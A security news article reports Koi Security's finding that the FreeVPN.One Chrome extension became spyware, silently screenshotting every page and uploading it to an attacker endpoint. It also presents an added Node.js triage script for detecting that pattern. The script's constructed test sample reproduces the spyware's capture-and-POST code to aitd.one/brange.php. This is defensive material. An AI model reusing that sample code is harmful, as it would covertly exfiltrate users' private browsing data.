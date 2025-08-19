
A popular Google-featured browser extension offering a virtual private network (VPN) service recently turned malicious and is now spying on users’ every move online.

Researchers from Koi Security found that FreeVPN.One, a VPN extension with over 100,000 installs on the Chrome Web Store, a ‘Verified’ status and a 3.8/5 rating from 1110 reviews, has been acting as spyware for the past five months.

Launched in 2020, according to the Chrome Stats website, FreeVPN.One was a seemingly legitimate Chrome VPN extension until the update to version 3.0.3 in April 2025. With that update, the developer added a broad host permission, meaning that the extension could now access every site a user visited.

“At this point, although the permission allowed broader access, the content scripts were still limited to the VPN provider’s domains. No spying yet, but the door was now open,” said Lotan Sery, author of the Koi Security report published on August 19.

Two updates later, on July 17, v3.1.3 shipped. With that version, the extension started silently capturing screenshots of users’ online activity and collecting and exfiltrating sensitive personal information.

Private pictures sent to FreeVPN.One’s backend. Source: Koi Security

Later in July, the developer added a further layer of concealment: the exfiltrated data is now encrypted with AES-256, with the AES key wrapped using RSA, and uploads moved from the aitd.one domain to a new subdomain, scan.aitd.one. This hides the payload from anyone inspecting the traffic but changes nothing about what is collected; the researchers read it as an attempt to “cover its tracks.”

The FreeVPN.One Spyware Capabilities Explained

The FreeVPN.One extension operates covertly by automatically capturing screenshots of every webpage users visit, without their knowledge or consent. It uses a two-stage process. First, its broad manifest permissions let it inject a content script into every HTTP and HTTPS page. After a deliberate 1.1-second delay (to let the page finish loading), that script messages the extension’s background service worker, which takes a silent screenshot via Chrome’s privileged captureVisibleTab() API. The captured image is then uploaded, together with the page URL, tab ID and a unique user identifier, to the attacker-controlled endpoint aitd[.]one/brange.php. No visual indicator is shown and no user interaction is required, and the cycle repeats on every page, so the extension harvests sensitive data continuously without detection.

The extension does include a legitimate-sounding “Scan with AI Threat Detection” feature, introduced in a July 2025 update (v3.1.1), and its privacy policy discloses that this feature uploads screenshots to aitd[.]one/analyze.php. That disclosure is a smokescreen: the scan is something the user clicks, whereas the silent capture to brange.php runs on every page with no click at all.

“Scan with AI” click redirects to aitd[.]one site. Source: Koi Security
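As an added example (not code from Koi Security, FreeVPN.One or this article), here is a small Node.js triage script that checks an unpacked Chrome MV3 extension for the two stages described above: first whether the manifest grants a broad host permission and whether its content scripts actually run on every site (the v3.0.3 “door open” state versus v3.1.3), then whether any script calls captureVisibleTab() and posts to a host outside the extension’s own. It generalises beyond this one extension to any extension with that shape. The manifests and sources it runs over are constructed stand-ins, the domain vpn.example is invented, and the host patterns and regexes are assumptions of this example, not a description of how Koi Security detected the extension.

```javascript
'use strict';
// Added example, not code from the article, Koi Security or FreeVPN.One.
// Static triage of an unpacked Chrome MV3 extension for the two-stage pattern
// the article describes: (1) a broad host permission plus a content script on
// every site, (2) a background script that calls captureVisibleTab() and posts
// the result off-box. All manifests and sources below are constructed samples.

// Match patterns that grant access to every site (Chrome manifest syntax).
const BROAD_PATTERNS = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);

function isBroad(pattern) {
  return BROAD_PATTERNS.has(String(pattern).trim());
}

// Stage 1: can the extension reach every site, and does it actually run there?
function triageManifest(manifest) {
  const hosts = [...(manifest.host_permissions || []), ...(manifest.permissions || [])];
  const broadHostPermission = hosts.some(isBroad);
  const contentScriptsOnAllSites = (manifest.content_scripts || [])
    .some((cs) => (cs.matches || []).some(isBroad));
  return { broadHostPermission, contentScriptsOnAllSites };
}

// Stage 2: look for the privileged screenshot API and every absolute URL the
// scripts reference. Plain regexes are a triage heuristic, not a JS parser:
// minified, obfuscated or string-encrypted code evades them, so a hit or a
// miss here still needs a human look at the code.
function triageSources(sources) {
  const joined = Object.values(sources).join('\n');
  const callsCaptureVisibleTab = /\bcaptureVisibleTab\s*\(/.test(joined);
  const remoteHosts = [...new Set(
    [...joined.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)].map((m) => m[1].toLowerCase()),
  )];
  return { callsCaptureVisibleTab, remoteHosts };
}

// Combine both stages into a verdict a reviewer can act on. allowedHosts are the
// domains the extension legitimately talks to (its own backend).
function triageExtension(manifest, sources, allowedHosts = []) {
  const m = triageManifest(manifest);
  const s = triageSources(sources);
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const unexpectedHosts = s.remoteHosts.filter((h) => !allowed.has(h));

  let verdict = 'no broad access';
  if (m.broadHostPermission && !m.contentScriptsOnAllSites) verdict = 'door open';
  if (m.broadHostPermission && m.contentScriptsOnAllSites) verdict = 'runs on every site';
  if (verdict === 'runs on every site' && s.callsCaptureVisibleTab && unexpectedHosts.length > 0) {
    verdict = 'screenshot capture with exfiltration';
  }
  return { ...m, ...s, unexpectedHosts, verdict };
}

// Constructed sample: the v3.0.3-like stage, broad host permission added but
// content scripts still limited to the (invented) VPN provider domain.
const MANIFEST_DOOR_OPEN = {
  manifest_version: 3,
  name: 'Sample VPN',
  version: '3.0.3',
  permissions: ['storage', 'proxy'],
  host_permissions: ['<all_urls>'],
  content_scripts: [{ matches: ['https://vpn.example/*'], js: ['content.js'] }],
  background: { service_worker: 'background.js' },
};
const SOURCES_DOOR_OPEN = {
  'content.js': "fetch('https://vpn.example/api/status'); // constructed: provider only",
  'background.js': "chrome.proxy.settings.set({ value: {}, scope: 'regular' });",
};

// Constructed sample: the v3.1.3-like stage, content script on every page and a
// worker that screenshots the tab and uploads it with URL, tab id and user id.
const MANIFEST_SPYWARE = {
  ...MANIFEST_DOOR_OPEN,
  version: '3.1.3',
  content_scripts: [{ matches: ['<all_urls>'], js: ['content.js'] }],
};
const SOURCES_SPYWARE = {
  'content.js':
    "setTimeout(() => chrome.runtime.sendMessage({ type: 'capture', url: location.href }), 1100);",
  'background.js': [
    "chrome.runtime.onMessage.addListener((msg, sender) => {",
    "  chrome.tabs.captureVisibleTab(sender.tab.windowId, { format: 'jpeg' }, (img) =>",
    "    fetch('https://aitd.one/brange.php', { method: 'POST',",
    "      body: JSON.stringify({ img, url: msg.url, tab: sender.tab.id, uid: 'constructed' }) }));",
    "});",
  ].join('\n'),
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [manifest, sources] of [[MANIFEST_DOOR_OPEN, SOURCES_DOOR_OPEN], [MANIFEST_SPYWARE, SOURCES_SPYWARE]]) {
    console.log(manifest.version, JSON.stringify(triageExtension(manifest, sources, ['vpn.example'])));
  }
}
```

To run it against a real unpacked extension, load manifest.json with JSON.parse and read each .js file into the sources map with fs.readFileSync; pass the vendor’s own backend domains as allowedHosts so that only unexpected hosts surface. The “door open” verdict is the one worth watching in update reviews: a permission that is granted but unused today is exactly what the April update introduced, months before the screenshots started.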